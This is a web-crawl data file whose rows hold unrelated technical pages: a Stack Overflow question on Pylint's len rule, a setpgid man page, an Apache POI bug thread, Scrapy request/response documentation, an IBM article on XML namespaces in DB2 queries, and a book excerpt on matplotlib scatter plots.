text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Why is the use of len(SEQUENCE) in condition values considered incorrect by Pylint? Considering this code snippet: from os import walk files = [] for (dirpath, _, filenames) in walk(mydir): # more code that modifies files if len(files) == 0: # <-- C1801 return None I was alarmed by Pylint with this message regarding the line with the if statement: [pylint] C1801:Do not use len(SEQUENCE)as condition value The rule C1801, at first glance, did not sound very reasonable to me, and the definition on the reference guide does not explain why this is a problem. In fact, it downright calls it an incorrect use. len-as-condition (C1801) : Do not use len(SEQUENCE)as condition value Used when Pylint detects incorrect use of len(sequence) inside conditions. My search attempts have also failed to provide me a deeper explanation. I do understand that a sequence's length property may be lazily evaluated, and that __len__ can be programmed to have side effects, but it is questionable whether that alone is problematic enough for Pylint to call such a use incorrect. Hence, before I simply configure my project to ignore the rule, I would like to know whether I am missing something in my reasoning. When is the use of len(SEQ) as a condition value problematic? What major situations is Pylint attempting to avoid with C1801? When is the use of len(SEQ)as a condition value problematic? What major situations is Pylint attempting to avoid with C1801? It’s not really problematic to use len(SEQUENCE) – though it may not be as efficient (see chepner’s comment). Regardless, Pylint checks code for compliance with the PEP 8 style guide which states that For sequences, (strings, lists, tuples), use the fact that empty sequences are false. > **Yes:** if not seq: > if seq: > > **No:** if len(seq): > if not len(seq): > As an occasional Python programmer, who flits between languages, I’d consider the len(SEQUENCE) construct to be more readable and explicit (“Explicit is better then implicit”). However, using the fact that an empty sequence evaluates to False in a Boolean context is considered more “Pythonic”. ★ Back to homepage or read more recommendations:★ Back to homepage or read more recommendations: From: stackoverflow.com/q/43121340
https://python-decompiler.com/article/2017-03/why-is-the-use-of-lensequence-in-condition-values-considered-incorrect-by-pyli
CC-MAIN-2019-35
refinedweb
375
57.71
setpgid, getpgid, setpgrp, getpgrp − set/get process group #include <unistd.h> int setpgid(pid_t pid, pid_t pgid); pid_t getpgid(pid_t pid); int setpgrp(void); pid_t getpgrp(void); set. On success, setpgid and setpgrp return zero. On error, −1 is returned, and errno is set appropriately. getpgid returns a process group on success. On error, −1 is returned, and errno is set appropriately. getpgrp always returns the current process group. EINVAL pgid is less than 0. EPERM Various permission violations. ESRCH pid does not match any process. SVr4, POSIX, 4.4BSD. The functions setpgid and getpgrp conform to POSIX.1. The function setpgrp is from BSD 4.2. The function getpgid conforms to SVr4. getuid(2), setsid(2), tcsetpgrp(3), termios(4)
http://alvinalexander.com/unix/man/man2/setpgrp.2.shtml
CC-MAIN-2019-47
refinedweb
121
72.63
When using the HSSFRow.cellIterator to traverse through a document, the column information is in reverse-sequential order. For example, if iterating through a document with data in two rows and three columns, the data will be in this order: (0,2),(0,1),(0,0),(1,2),(1,1),(1,0). The HSSFSheet.rowIterator properly iterates through the data in forward- sequential order. I duplicated this bug in the 1.5 release and the 1.6 build release. There is no contract guaranteeing the order. Furthermore, they can appear in any order in the underlying file format. If there is an implied ordering of the cells (a number that can be retrieved from getCellNum()), why wouldn't the cellIterator() method return the rows in that order? It seems inconsitent at best since the rowIterator does return (at least in my example) the rows in the implied order that they exist in the spreadsheet. The documentation should reflect the fact that the *Iterator routines will return the results in random order. The implied ordering is "whatever is in the file" or some variant of "whatever was most efficient to store". This is where the rubber meets the road. While I realize it can be inconvienient for the user to reorder, its far more efficient then us ordering them in a particular order. If they are precisely in reverse because of something we're doing, feel free to submit a patch, but I'm against enforcing any contract as to the order. Your point about the documentation is well taken, please submit a patch and I'll apply it against the head. (2.0) (if patch is provided please reopen) I respectfully disagree with the decision to close this bug. It just makes sense to have the cellIterator() return the Iterator in the correct forward order. This method could be very convenient, but if the programmer has to reorder it, it's pretty much useless. I believe this is happening because HashMap was used. Couldn't a different data structure be used instead? Can we please keep this one open for a while and let some folks vote on it? thanks, Barry Sure. You can leave it open and please feel free to vote (if enough people feel that way and I think they are making an INFORMED vote I/other commiters may change my/our mind). I'm retargeting to 2.0 because there is like NO way we're backporting such changes into 1.5.1 (behavioral/feature-oriented,etc). However, the fact we're using a HashMap will change in 3.0 and instead we'll probably return them in the order you suggest just due to HOW we'll be storing it. I just don't want to guarantee order in this interface because it could change and the file format itself might effect it. Personally, I think you're suffering from file-format API versus VBA-style API confusion. The HSSF usermodel is to give you access to the file format without exposing you to certain nasty details (such as the fact that rows are completely unrelated to cells and all the little records and intricacies). VBA and Formula 1 make it look like you're using Excel (and one interfaces with Excel single-threadedly, and the other is a full implementation of Excel in Java more or less...to the tune of 10k). Its the difference between abstracting the file format to you and creating an implementation of Excel. We make this decision for performance reasons and simplicity. (Formula 1 and VBA APIs are simpler to conceieve but harder to master because there are just so freaking many of them...10 different ways to do EVERYTHING... HSSF seeks a greater conceptual simplicity. Also "convienience functions" are by [apparent] community consensus until a later release -- we're all infected with eXtremeProgramming style thought.) Besides. Just because you need the cells or rows in order, doesn't mean everyone does. Depending on what you're doing, the reactor pattern (in your own code) might help you here regardless of whether you're using the eventmodel: Hi, I'm new to this, so please excuse me if I do anything incorrectly. I've voted for this to be changed because of the following: -> While no contract to order exists, there is certainly a logical expectation of sequence because the HSSFSheet.rowIterator() does deliver its results ordered from low to high, so why not HSSFRow.cellIterator? -> It appears easy to do - I got an ordered sequence by simply changing the HashMap cells to TreeMap (and removing the constructors initial capacity) in HSSFRow.java - only 3 lines. By the way, this will make it consistent with the TreeMap rows defined in HSSFSheet.java. If the change is declined, perhaps a compromise method (e.g. HSSFRow.orderedCellIterator() - that converts the HashMap to a TreeMap?). Cheers, Sean As a result of the recent performance change, the storage of the HSSFCell objects was changed from a TreeMap implementation to an array based one. This has the beneficial sideeffect that the cellIterator is now in cell order. This change is available in SVN. Jason
https://bz.apache.org/bugzilla/show_bug.cgi?id=9403
CC-MAIN-2021-17
refinedweb
860
64.3
Support » Pololu AVR C/C++ Library User’s Guide » 3. Functional Overview and Example programs » 3.l. Pololu Wheel Encoder Functions The PololuWheelEncoders class and the associated C functions provide an easy interface for using the Pololu Wheel Encoders, which allow a robot to know exactly how far its motors have turned at any point in time. Note that this library should work with all standard quadrature encoders, not just the Pololu Wheel Encoders. This section of the library makes uses of pin-change interrupts to quickly detect and record each transition on the encoder. Interrupt vectors for PCINT0, PCINT1, PCINT2 (and PCINT3 on the Orangutan SVP and X2) will be defined if functions from this library are used, even if the pins selected are all on a single port, so this section of the library will conflict with any other uses of these interrupts. The interrupt service routine (ISR) will take about 20-30 us. If you need better control of the interrupts used, or you want to write a more efficient ISR, you can copy the library code from PololuWheelEncoders.cpp into your own project and modify it as necessary. Complete documentation of this library’s methods can be found in Section 18 of the Pololu AVR Library Command Reference. Usage Notes The two sensors A and B on the encoder board go through a four-step cycle as each tooth of the wheel passes by, for a total of 48 counts per revolution. This corresponds to about 3 mm for each count, though you will have to calibrate values for your own robot to get a precise measure of distance. Normally, there will be at least 1 ms between counts, which gives the ISR plenty of time to finish one count before the next one occurs. This is very important, because if two counts occur quickly enough, the ISR will not be able to determine the direction of rotation. In this case, an error can be detected by the functions encoders_check_error_m1() or encoders_check_error_m2(). An error like this either corresponds to a miscalibration of the encoder or a timing issue with the software. For example, if interrupts are disabled for several ms while the wheels are spinning quickly, errors will probably occur. Usage Examples This library comes with one example program in libpololu-avr\examples. The example measures the outputs of two encoders, one connected to ports PC2 and PC3, and another connected to ports PC4 and PC5. The values of the two encoder outputs and errors (if any) are displayed on the LCD. For use on the Baby Orangutan, remove the LCD display code (and come up with some other way to use the values). 1. wheel_encoders1 #include <pololu/orangutan.h> int main() { // Initialize the encoders and specify the four input pins. encoders_init(IO_C2, IO_C3, IO_C4, IO_C5); while(1) { // Read the counts for motor 1 and print to LCD. lcd_goto_xy(0,0); print_long(encoders_get_counts_m1()); print(" "); // Read the counts for motor 2 and print to LCD. lcd_goto_xy(4,0); print_long(encoders_get_counts_m2()); print(" "); // Print encoder errors, if there are any. if(encoders_check_error_m1()) { lcd_goto_xy(0,1); print("Error 1"); } if(encoders_check_error_m2()) { lcd_goto_xy(0,1); print("Error 2"); } delay_ms(50); } }
https://www.pololu.com/docs/0J20/3.l
CC-MAIN-2015-22
refinedweb
529
61.16
Scrap. A Request object represents an HTTP request, which is usually generated in the Spider and executed by the Downloader, and thus generating a Response. A string containing the URL of this request. Keep in mind that this attribute contains the escaped URL, so it can differ from the URL passed in the constructor. This attribute is read-only. To change the URL of a Request use replace(). A string representing the HTTP method in the request. This is guaranteed to be uppercase. Example: "GET", "POST", "PUT", etc A dictionary-like object which contains the request headers. A str that contains the request body. This attribute is read-only. To change the body of a Request use replace(). accesed, in your spider, from the response.meta attribute. Return a new Request which is a copy of this Request. See also: Passing additional data to callback functions. Return a Request object with the same members, except for those members given new values by whichever keyword arguments are specified. The attribute Request.meta is copied by default (unless a new value is given in the meta argument). See also Passing additional data to callback functions. The callback of a request is a function that will be called when the response of that request is downloaded. The callback function will be called with the downloaded Response object as its first argument. Example: def parse_page1(self, response): return Request("", callback=self.parse_page2) def parse_page2(self, response): # this would log self.log( = Request("", callback=self.parse_page2) request.meta['item'] = item return request def parse_page2(self, response): item = response.meta['item'] item['other_url'] = response.url return item The Request.meta attribute can contain any arbitrary data, but there are some special keys recognized by Scrapy and its built-in extensions. Those are: Here is the list of built-in Request subclasses. You can also subclass it to implement your own custom functionality. The FormRequest class extends the base Request with functionality for dealing with HTML forms. It uses the ClientForm library (bundled with Scrapy) to pre-populate form fields with form data from Response objects. The FormRequest class adds a new argument to the constructor. The remaining arguments are the same as for the Request class and are not documented here. The FormRequest objects support the following class method in addition to the standard Request methods: Returns a new FormRequest object with its form field values pre-populated with those found in the HTML <form> element contained in the given response. For an example see Using FormRequest.from_response() to simulate a user login. Keep in mind that this method is implemented using ClientForm whose() (and ClientForm) behaviour may not be the most appropiate. To disable this behaviour you can set the dont_click argument to True. Also, if you want to change the control clicked (instead of disabling it) you can also use the clickdata argument. The other parameters of this class method are passed directly to the FormRequest constructor. New in version 0.10.3: The formname parameter. If you want to simulate a HTML Form POST in your spider and send a couple of key-value fields, you can return a FormRequest object (from your spider) like this: return [FormRequest(url="", formdata={'name': 'John Doe', age: '27'}, callback=self.after_post)]: class LoginSpider(BaseSpider): name = 'example.com' start_urls = [''] def parse(self, response): return [FormRequest.from_response(response, formdata={'username': 'john', 'password': 'secret'}, callback=self.after_login)] def after_login(self, response): # check login succeed before going on if "authentication failed" in response.body: self.log("Login failed", level=log.ERROR) return # continue scraping with authenticated session... A Response object represents an HTTP response, which is usually downloaded (by the Downloader) and fed to the Spiders for processing. A string containing the URL of the response. This attribute is read-only. To change the URL of a Response use replace(). An integer representing the HTTP status of the response. Example: 200, 404. A dictionary-like object which contains the response headers. A str containing the body of this Response. Keep in mind that Reponse.body is always a str. If you want the unicode version use TextResponse.body_as_unicode() (only available in TextResponse and subclasses). This attribute is read-only. To change the body of a Response use replace(). The Request object that generated this response. This attribute is assigned in the Scrapy engine, after the response and the request have passed through all Downloader Middlewares. In particular, this means that: A shortcut to the Request.meta attribute of the Response.request object (ie. self.request.meta). Unlike the Response.request attribute, the Response.meta attribute is propagated along redirects and retries, so you will get the original Request.meta sent from your spider. See also Request.meta attribute. Returns a new Response which is a copy of this Response. Returns a Response object with the same members, except for those members given new values by whichever keyword arguments are specified. The attribute Response.meta is copied by default (unless a new value is given in the meta argument). Here is the list of available built-in Response subclasses. You can also subclass the Response class to implement your own functionality. TextResponse objects adds encoding capabilities to the base Response class, which is meant to be used only for binary data, such as images, sounds or any media file. TextResponse objects support a new constructor argument, in addition to the base Response objects. The remaining functionality is the same as for the Response class and is not documented here. TextResponse objects support the following attributes in addition to the standard Response ones: A string with the encoding of this response. The encoding is resolved by trying the following mechanisms, in order: TextResponse objects support the following methods in addition to the standard Response ones: Returns the body of the response as unicode. This is equivalent to: response.body.decode(response.encoding) But not equivalent to: unicode(response.body) Since, in the latter case, you would be using you system default encoding (typically ascii) to convert the body to uniode, instead of the response encoding. The HtmlResponse class is a subclass of TextResponse which adds encoding auto-discovering support by looking into the HTML meta http-equiv attribute. See TextResponse.encoding. The XmlResponse class is a subclass of TextResponse which adds encoding auto-discovering support by looking into the XML declaration line. See TextResponse.encoding.
http://readthedocs.org/docs/scrapy/en/0.7/topics/request-response.html
crawl-003
refinedweb
1,063
51.75
To some, they're a solution; to others, they're a stumbling block. But whether you love them or loathe them, XML namespaces are everywhere. Indeed, many developers consider them a necessity. Open a Web service definition language (WSDL) file or SOAP message, convert a word processing document into XML, or skim through industry-specific XML schemas; chances are you'll find references to multiple namespaces. And that's something you need to consider if you want to query XML data, because namespaces change everything. (Well, not quite everything. But namespaces have a significant impact on the semantics of your queries.) Ignore the presence of namespaces, and the queries you write aren't likely to produce the desired results. That's the bad news. The good news is that it won't take a large investment of time to learn how to properly query XML data that contains namespaces. This article can help you get started. Introducing XML namespaces XML namespaces are a W3C XML standard. Indeed, XPath, XML Schema, XQuery, and other XML technologies support namespaces. While this article does not provide a detailed tutorial on namespaces, it does highlight a few key concepts. To learn more about XML namespaces, see the Resources section. XML namespaces allow XML documents to incorporate elements and attributes from different vocabularies without ambiguity and processing conflicts. XML namespaces potentially provide organizations a universally unique markup vocabulary (element and attribute names) for their XML data, as well as the ability to share this vocabulary with others. Some firms rely on namespaces to help them combine XML data from different sources, to version XML schemas as business needs evolve, and to promote document reuse. Still, many IT professionals disagree on how namespaces should be used. Some advocate frequent and widespread use in documents and schemas. Others urge caution or avoidance. If you're curious about the debate, see the Resources section. I won't jump into that fray in this article. I'll just explain how you can query XML data that contains namespaces, because you'll probably encounter namespaces in your work. What, then, are namespaces? They're a collection of unique XML element and attribute names identified by a Uniform Resource Identifier (URI). These URIs often look like Web site URLs (that is, they include domain names such as), although sometimes a Universal Resource Name (URN) is used. In either case, a URI doesn't actually retrieve data from the specified location. If the URI takes the form of a URL, it doesn't even need to reference a real Web page; it can be a "fake" URL that simply serves as an identifier. XML namespaces are declared using the xmlns keyword. Listing 1 shows two valid namespace declarations for elements within an XML document. The <employee> element has a URL-based URI, while the <partner> element has a URN-based URI. Listing 1. Sample namespace declarations Did you notice another difference between these namespace declarations, beyond the type of URI specified? Indeed, the <partner> element includes a namespace that both defines and contains a prefix ( p, in this example). The use of namespace prefixes is optional, but it's more than just a stylistic choice. If an element has a namespace prefix, it belongs to the namespace defined for that prefix; however, its child elements don't belong to the same namespace unless they are prefixed as well. Elements that contain a namespace declaration but no namespace prefix (such as the <employee> element in the previous example) belong to the declared namespace. Their child elements also belong to this same namespace unless specifically overridden. Finally, unprefixed elements that lack an explicit namespace declaration are bound to the in-scope default namespace. If there is no such binding, the element does not belong to any namespace. Consider the example in Listing 2: Listing 2. A sample XML document with multiple namespaces In this case, the employee name belongs to the default namespace declared in the <employee> element (). However, the partner name isn't within the scope of any namespace. Although it's a sub-element of <partner>, this <name> element doesn't inherit its parent's namespace because that namespace is declared with a prefix. You can rewrite the line as follows to include the partner's name information in the same namespace as its parent: Listing 3.An element modified to include a namespace prefix Finally, the department name doesn't belong to any namespace. This is because no namespace is declared in the <department> element, and it isn't bound to a default namespace. As you can see, it's easy to create confusion by mixing and matching various forms of namespace declarations within a single document. In general, if you have the luxury of defining the XML data you'll be working with, be consistent in your use of namespaces. It simplifies your applications and queries. Subsequent sections explore how the scope of a namespace impacts queries. Before you can consider how to query XML data that contains namespaces, you need some sample data. For this purpose, I'm using DB2 V9 to store and query XML data about business partners, which I'll maintain in a single PARTNERS table. If you plan to follow along, you need to create this table in a DB2 UTF-8 database. (See "Get off to a fast start with DB2 Viper" for database creation instructions.) The script in Listing 4 creates the table and inserts several rows into this table (each of which contains one XML document): Listing 4. The script to create a sample table with data These XML documents track similar information about business partners, including the company names, area of specialty, and business partner representatives. However, each document uses namespaces somewhat differently, and some contain multiple namespaces. I've purposefully included diverse examples of namespace usage to illustrate the impact these namespaces will have on subsequent queries. The queries that follow are all designed to be issued from the DB2 command-line processor. From a DB2 command window, issue the following command to set up a command-line environment in which query statements terminate with a percentage sign ( <%>), and XML output displays in an easy-to-read fashion: Listing 5. Set up the DB2 command-line environment The <%> is not the default termination character. The default termination character (a semicolon or ";") must be overridden in the command-line environment because it is reserved in XQuery for separating a prolog, such as a namespace declaration, from the body of the query. If you prefer, you can use the Command Editor of the DB2 Control Center to issue your queries. Use XPath expressions in SQL/XML and XQuery Query XML data that contains namespaces requires you to specify appropriate namespace information in your path expressions. Both SQL/XML and XQuery support XPath expressions that allow for navigation through an XML hierarchy. If you're not already familiar with how to incorporate path expressions into SQL/XML and XQuery, read "Query DB2 XML data with SQL/XML" and "Query DB2 XML data with XQuery." Now, let's step through several sample tasks and explore how to write XQueries to retrieve the desired information. I'll also show you how to write SQL/XML queries that meet your needs. Case 1: Return all XML "company" data Your first task is simple: retrieve "company" data about all business partners. If you want to obtain a set of all partner XML data, you could write a simple SQL query: Listing 6. An SQL query to retrieve all company data But suppose you want to obtain a sequence of company data. To do that, you need to write an XQuery. If you've never worked with namespaces, you might be tempted to write a query such as: Listing 7. An incorrect XQuery to retrieve all company data However, this query returns only one XML document from the sample table: Listing 8. The output from the previous XQuery This is because the path expression in the query targets only <company> elements that have no namespaces. To retrieve all <company> elements, you need to rewrite the query. To do this simply, use a wildcard (*) in the path expression. The following XQuery causes DB2 to retrieve all <company> elements at the root node of your documents, regardless of namespaces: Listing 9. A revised XQuery to retrieve all company data In SQL/XML, this query could be expressed as: Listing 10. An SQL/XML query to retrieve all company data You may wonder why a WHERE clause appears in this query. Strictly speaking, given the sample data, it's not necessary. That's because every XML document in the PARTNERS table contains a root <company> element, and you want to retrieve all company information, regardless of namespaces. However, if you have a document with a root <firm> element stored in PARTNERS.DETAILS and you omit the WHERE clause shown, DB2 returns an empty record for that document. This is due to the semantics of SQL: without a WHERE clause, SQL queries do not filter out any rows from the table in the returned result set. Thus, if you use SQL/XML to query XML data, you must include a WHERE clause with an XMLExists() function (or other filtering predicate) to ensure your results don't include a row for every row present in the table. Case 2: Return all XML "company" data for a selected namespace Often, you may need to restrict queries of XML data to specific namespaces. This section considers how to obtain full XML documents for company records associated with the urn:xmlns:saracco-sample:company1.0 namespace. With DB2, you must declare the namespace of interest to you as part of your query. Listing 11 declares a default namespace for a subsequent XQuery expression: Listing 11. Declare a default namespace in an XQuery This clause cannot be run independently. Attempts to do so produce an SQL16002N error. The namespace declaration must be immediately followed by the XQuery you wish to issue. This example declares a default namespace and instructs DB2 to retrieve information about all companies associated with that namespace: Listing 12. An XQuery using a default namespace Given the contents of Listing 4, DB2 returns a sequence of four XML records: Listing 13. The output from the previous XQuery Information for Acme Tech isn't included in the result because its <company> element doesn't belong to the declared namespace. Listing 14 shows one way to express the previous XQuery in SQL/XML: Listing 14. An SQL/XML query with a default namespace The XMLExists() function restricts the results to the four company records associated with the namespace of interest. Case 3: Explore case sensitivity in namespaces Consider a query very similar to the example shown in Listing 12: Listing 15. Revised XQuery with a namespace modification On close inspection of this query, only a single character differs from the XQuery shown earlier. In this case, "Company1.0" begins with a capital letter, while the previous query referred to "company1.0" as part of the namespace definition. This query executes successfully but returns no records. That's because namespaces are case sensitive, as are XPath expressions. If your queries execute without error but return no data, double-check the path expressions and namespace declarations in your query. This is true for both XQuery and SQL/XML. Case 4: Declare prefixed namespaces Until now, the examples declared a default namespace for each of the queries. However, you can also declare a namespace with a prefix and reference this prefix in your queries as needed. If you typically create XML documents that contain namespace prefixes, this approach will be quite natural to you. Furthermore, if your query needs to reference XML elements that belong to different namespaces, you have to use prefixes, as you'll see later in this article. Here's how to rewrite the XQuery in Listing 12 to use a namespace prefix rather than a default namespace: Listing 16. Use a namespace prefix in an XQuery Similarly, here's how to rewrite the SQL/XML equivalent to use a namespace prefix: Listing 17. The SQL/XML equivalent to the previous XQuery The namespace prefix used in the query can be different from the prefix used in the data. What matters is that the prefix is bound to the same namespace URI that is used in the data. You can use a prefixed namespace in your query to retrieve elements that have a default namespace in your documents, as well as perform the reverse operation. Case 5: Retrieve XML fragments While cases 1 through 4 retrieved entire XML documents stored in DB2, it's quite common to write queries that retrieve only document fragments. Of course, the presence of namespaces impacts such queries as well. Consider this XQuery, which instructs DB2 to retrieve the company names of all partners in which the <company> element and its child <name> element belong to a common namespace ( urn:xmlns:saracco-sample:company1.0 ): Listing 18. An XQuery to retrieve company names that belong to a specific namespace This query returns a sequence of three XML elements when run against the sample data: Listing 19. The output from the previous XQuery The record for Maribel Enterprises isn't returned. Although its <company> element belongs to the namespace specified in the query, its <name> element does not. This is because the record's <company> element is defined with a namespace prefix in the table. Because its child nodes (including the <name> element) don't contain namespace prefixes, they don't belong to any namespace. Here's how to express the previous query in SQL/XML: Listing 20. The SQL/XML equivalent to the previous XQuery Case 6: Reference multiple namespaces in a single query Since many XML documents contain elements associated with different namespaces, some of your queries may need to reference multiple namespaces. In this case, simply declare multiple namespaces in the query and reference each as needed. Consider this query, which retrieves contact information for various companies: Listing 21. Use multiple namespaces in an XQuery Given the sample data in Listing 4, DB2 returns a single record that contains contact information for Raymond Sanchez: Listing 22. The output from the previous XQuery These are some of the reasons additional records don't qualify: - John Smith's record has no namespaces associated with his company or contact data. - Klaus Fischer's record shares the specific company namespace declaration, but his contact data belongs to a namespace that isn't specified in the query. (His contact data is associated with the urn:xmlns:saracco-sample:company1.0namespace.) - Maribel Payton's record shares the specific company namespace declaration, but her contact data doesn't belong to any namespace. - Helen Rakai's record shares the specific company namespace declaration, but her contact data belongs to another namespace. ( of). Listing 23 shows one way to express this query in SQL/XML: Listing 23. The SQL/XML equivalent to the previous XQuery Case 7: More information on multiple namespaces Since working with multiple namespaces can seem tricky at first, consider another example that's slightly more complex. Review this query and see if you can understand its intent: Listing 24. Another XQuery that references multiple namespaces This query instructs DB2 to retrieve the <title> element of contacts for various companies. It also specifies that qualifying <company> elements can be associated with any namespace, that <contact> elements must belong to the namespace, and that <title> elements cannot belong to any namespace. Given the sample data, no records are returned for this query. One record -- for Helen Rakai -- comes close because it contains a root <company> element with a <contact> sub-element that belongs to the namespace specified. However, its <title> element belongs to a specific namespace; because of this, the record does not match the query's filtering criteria. Case 8: Use namespaces and attributes in queries Cases 1 through 7 involve queries over XML element nodes. You need to consider how namespaces apply to attributes as well. The situation isn't what you might expect. Attributes never inherit a namespace from their elements and never assume a default namespace. If an attribute has a prefix, it belongs to the namespace indicated by the prefix. If an attribute has no prefix, it has no namespace. For details, see the "W3C Namespaces Recommendation". Of course, you need to take such information into account when you write queries. Consider this XQuery example, which retrieves the names of public companies: Listing 25. An XQuery example that involves a namespace and an attribute This query specifies that qualifying <company> and <name> elements must belong to a specific namespace ( urn:xmlns:saracco-sample:company1.0). The presence of a namespace prefix ( c) in this query indicates that. Note that the @type attribute, which indicates whether a company is public or private, does not include a namespace prefix. Thus, this query produces two records: Listing 26. The output from the previous XQuery If you specify a namespace for the @type attribute in the query, as shown in Listing 27, none of the sample XML documents qualify. In this case, DB2 returns no records: Listing 27. A revised XQuery If you want to use SQL/XML to retrieve the names of public companies, you could write a query similar to this one: Listing 28. The SQL/XML equivalent of the XQuery shown in Listing 25 Case 9: Convert XML data to relational data Finally, how do you convert XML data with namespaces into relational data? Many existing applications and commercial tools (such as query/report writers) are designed to work with data stored in the columns of traditional SQL data types, such as VARCHAR, INT, DATE, and so on. As a result, programmers use the SQL/XML() function to dynamically convert XML data into more traditional SQL data types. Of course, the presence of namespaces in the original XML data affects how you must write such "transformational" queries. Consider the next example, which retrieves information about business partners with a "Silver" status whose company data is associated with a given namespace. In particular, the query returns the company's ID and name, as well as the name and email address of the company's contact person. Listing 29. An SQL/XML query that involves XMLTable()and namespaces A few aspects of this query are worth noting. First, the query is written in SQL/XML. You cannot express this particular query in pure XQuery (with no SQL) because the data to be returned includes company IDs, which are stored in an SQL integer column. XQuery operates on XML data types, not relational data types. Secondly, each path expression in the SQL/XML query requires a separate namespace declaration. Thus, this query declares the namespace for urn:xmlns:saracco-sample:company1.0 twice in this example. Lastly, names and email addresses of qualifying company representatives can belong to any namespace (or to no namespace), so the path expressions for the NAME and EMAIL columns don't need to declare a namespace. DB2 returns a three-row result set for this query: Listing 30. The output from the previous SQL/XML query If you want to learn more than the basics of XQuery and SQL/XML, you must understand how the presence of XML namespaces in documents and messages impact the semantics of their queries. If you don't, you may have unexpected, or undesired, results. Fortunately, it's not hard to learn how to query XML documents that contain namespaces. This article provides several examples to help you get started. Thanks to Matthias Nicola, Bryan Patterson, and Bert van der Linden for their review of this paper. Learn - DB2 XML technical enablement Wiki: Find papers, Webcasts, and demos on DB2 XML. - "Query DB2 XML data with XQuery" (developerWorks, April 2006): Learn more about XQuery. - "Query DB2 XML data with SQL" (developerWorks, March 2006): Learn more about SQL/XML. - "pureXML in DB2 9: Which way to query your XML data?" (developerWorks, June 2006): Explore when to use SQL/XML and XQuery. - "Get off to a fast start with DB2 Viper" (developerWorks, March 2006): Learn more about DB2 9 pureXML. - For a brief introduction to XML namespaces, read "Plan to use XML namespaces, part 1" (developerWorks, November 2002), "XML Namespace by Example" (O'Reilly xml.com, January 1999), or review an online tutorial. - "W3C Namespaces Recommendation": Get detailed information on XML namespaces. - "XML Namespaces and How They Affect XPath and XSLT" (MSDN library, May 2002): Get more examples of how XML namespaces impact XPath. - "Abolish XML namespaces?" (developerWorks, July 2005) and "Principles of XML design: Use XML namespaces with care"" (developerWorks, April 2004): Understand some of the controversy about using XML namespaces. -.
http://www.ibm.com/developerworks/data/library/techarticle/dm-0611saracco/index.html
crawl-003
refinedweb
3,465
53.92
Hi, I have a small doubt in C++ assignment. I have been assigned to do seat reservation in a certain foodcourt. I have already done the seat reservation thing using basic array and function. But my program can only do manual seat reservation. Which means the user gets to choose whichever seat he wants. But my lect wants it to be automatic as in like the prog will assign the user with the seat number when he says for e.g. "Seat for 5"... So I am confused in how to start with...how should be using the array to automatically assign the seat numbers? Please help me...Thanks a ton. My code is reflected below: #include <iostream> using namespace std; int seat,num,num1; string table "}; void Selectseat(string list[],int arraysize); void Deselectseat(string list[],int arraysize); void DisplayFC(void); void Selectseat(string list[],int arraysize) { for(int i=0;i<seat;i++) { cout<<"Select the seat number that you want :"; cin>>num; if(num==2 || num==4 || num==6 || num==8 || num==10 || num==12) { list[num]=" O "; } else { list[num]=" O "; } } } void Deselectseat(string list[],int arraysize) { for(int j=0;j<seat;j++) { string number "}; cout<<"Enter the seat number that you sit just now : "; cin>>num; list[num]=number[num]; } } void DisplayFC(void) { cout<<" "<<table[1]<<"|"<<table[2]<<" "<<table[5]<<"|"<<table[6]<<" "<<table[9]<<"|"<<table[10]<<endl; cout<<" -------"<<" -------"<<" ---------"<<endl; cout<<" "<<table[3]<<"|"<<table[4]<<" "<<table[7]<<"|"<<table[8]<<" "<<table[11]<<"|"<<table[12]<<endl; cout<<" Table 1"<<" Table 2"<<" Table 3"<<endl; cout<<endl; cout<<" "<<table[13]<<"|"<<table[14]<<"|"<<table[15]<<" "<<table[19]<<"|"<<table[20]<<"|"<<table[21]<<" "<<table[25]<<"|"<<table[26]<<"|"<<table[27]<<endl; cout<<" --------------"<<" --------------"<<" --------------"<<endl; cout<<" "<<table[16]<<"|"<<table[17]<<"|"<<table[18]<<" "<<table[22]<<"|"<<table[23]<<"|"<<table[24]<<" "<<table[28]<<"|"<<table[29]<<"|"<<table[30]<<endl; cout<<" Table 4"<<" Table 5"<<" Table 6"<<endl; cout<<endl; cout<<" "<<table[31]<<"|"<<table[32]<<"|"<<table[33]<<"|"<<table[34]<<" "<<table[39]<<"|"<<table[40]<<"|"<<table[41]<<"|"<<table[42]<<" "<<table[47]<<"|"<<table[48]<<"|"<<table[49]<<"|"<<table[50]<<endl; cout<<" -------------------"<<" -------------------"<<" -------------------"<<endl; cout<<" "<<table[35]<<"|"<<table[36]<<"|"<<table[37]<<"|"<<table[38]<<" "<<table[43]<<"|"<<table[44]<<"|"<<table[45]<<"|"<<table[46]<<" "<<table[51]<<"|"<<table[52]<<"|"<<table[53]<<"|"<<table[54]<<endl; cout<<" Table 7"<<" Table 8"<<" Table 9"<<endl; return; } int main() { do { system("cls"); cout<<endl; cout<<"Welcome to FC4"<<endl; cout<<"--------------"<<endl; cout<<endl; cout<<"FC4 Layout"<<endl; cout<<endl; cout<<"O means the seat is occupied"<<endl; cout<<"Please wait or go to other FC if all the table shown O."<<endl; cout<<"Bags are not allow to occupy seats"<<endl; cout<<endl; DisplayFC(); cout<<endl; cout<<"Press 1 for selecting seats,Press 2 for deselecting seats : "; cin>>num1; cout<<endl; if(num1==1) { cout<<"Number of Seats you need : "; cin>>seat; cout<<endl; DisplayFC(); cout<<endl; Selectseat(table,54); } else { cout<<"Number of people who leaving : "; cin>>seat; cout<<endl; Deselectseat(table,54); } }while(1); return 0; }
https://www.daniweb.com/programming/software-development/threads/209612/auto-assign
CC-MAIN-2017-26
refinedweb
485
55.88
Two interesting aspects of this dataset are the nonlinearity and the interplay of the variables. If you installed matplotlib () in Chapter 8 you can visualize some of the variables using advancedclassify and generating a couple of lists from it. (This step is not necessary to work through the rest of the chapter.) Try this in your Python session: from pylab import * def plotagematches(rows): xdm,ydm=[r.data[0] for r in rows if r.match==1],\ [r.data[1] for r in rows if r.match==1] xdn,ydn=[r.data[0] for r in rows if r.match==0],\ [r.data[1] for r in rows if r.match==0] plot(xdm,ydm,'go') plot(xdn,ydn,'ro') show( ) Call this method from your Python session: >>> reload(advancedclassify)<module 'advancedclassify' from 'advancedclassify.py'> >>> advancedclassify.plotagematches(agesonly) This will generate a scatter plot of the man's age versus the woman's age. The points will be O if the people are a match and X if they are not. You'll get a window like the one shown in Figure 9-1. Figure 9-1. Generated age-age scatter plot Although there are obviously many other factors that determine whether two people are a match, this figure is based on the simplified age-only dataset, and it shows an obvious boundary that indicates people do not go far outside their own age range. The boundary also appears to curve and become less defined as people ... No credit card required
